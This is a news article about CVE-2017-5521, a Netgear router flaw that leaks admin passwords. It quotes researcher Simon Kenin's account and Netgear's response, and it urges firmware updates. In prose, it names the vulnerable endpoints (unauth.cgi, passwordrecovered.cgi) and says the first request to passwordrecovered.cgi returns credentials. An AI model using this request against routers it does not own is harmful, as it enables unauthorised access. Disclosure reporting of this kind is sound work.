Netgear exploit could expose passwords for thousands of routers

It’s time to update your firmware. An exploit that affects a number of Netgear routers can easily give hackers access to your wireless admin password which could lead to router lock-out or, worse, illicit use of your Internet.

The exploit, which Netgear firmly patched, used a bug found in 2014 to expose admin passwords in plain text.

A researcher for Trustwave, Simon Kenin, first uncovered the problem a year ago when he lost his administration password. He tried to hack his own router, eventually uncovering a secret feature designed to allow password recovery.

He wrote:

I woke up the next morning excited by the discovery, I thought to myself: “3 routers with same issue… Coincidence? I think not”. Luckily, I had another, older NETGEAR router laying around; I tested it and bam! Exploited.

I started asking people I knew if they have NETGEAR equipment so I could test further to see the scope of the issue. In order to make life easier for non-technical people I wrote a python script called netgore, similar to wnroast, to test for this issue.

I am not a great programmer. I am aware of that and that is why I don’t work as a full time programmer. As it turned out, I had an error in my code where it didn’t correctly take the number from unauth.cgi and passed gibberish to passwordrecovered.cgi instead, but somehow it still managed to get the credentials!

“Wait… what is going on here?” I thought to myself. After few trials and errors trying to reproduce the issue, I found that the very first call to passwordrecovered.cgi will give out the credentials no matter what the parameter you send. This is totally new bug that I haven’t seen anywhere else. When I tested both bugs on different NETGEAR models, I found that my second bug works on a much wider range of models.

The exploit affects the following models:

screen-shot-2017-01-31-at-10-37-30-am

If you have any of these check your admin panel for a firmware update to ensure nefarious sniffers don’t break into your router and wreak havoc.

UPDATE – Netgear writes:

NETGEAR is aware of the vulnerability (CVE-2017-5521), that has been recently publicized by TrustWave. This is not a new or recent development. We have been working with the security analysts to evaluate the vulnerability. NETGEAR has published a knowledge base article from our support page, which lists the affected routers and the available firmware fix.

Firmware fixes are currently available for the majority of the affected devices. To download the firmware release that fixes the password recovery vulnerability, click the link for the model and visit the firmware release page for further instructions. For devices that are still pending final firmware updates, please follow the advised work around.

Please note that this vulnerability occurs when an attacker can gain access to the internal network or when remote management is enabled on the router. Remote management is turned off by default; although remote management can turned on through the advanced settings.

NETGEAR does appreciate and value having security concerns brought to our attention. We constantly monitors for both known and unknown threats. Being pro-active rather than re-active to emerging security issues is fundamental for product support at NETGEAR.
It is NETGEAR’s mission to be the innovative leader in connecting the world to the internet. To achieve this mission, we strive to earn and maintain the trust of those that use NETGEAR products for their connectivity.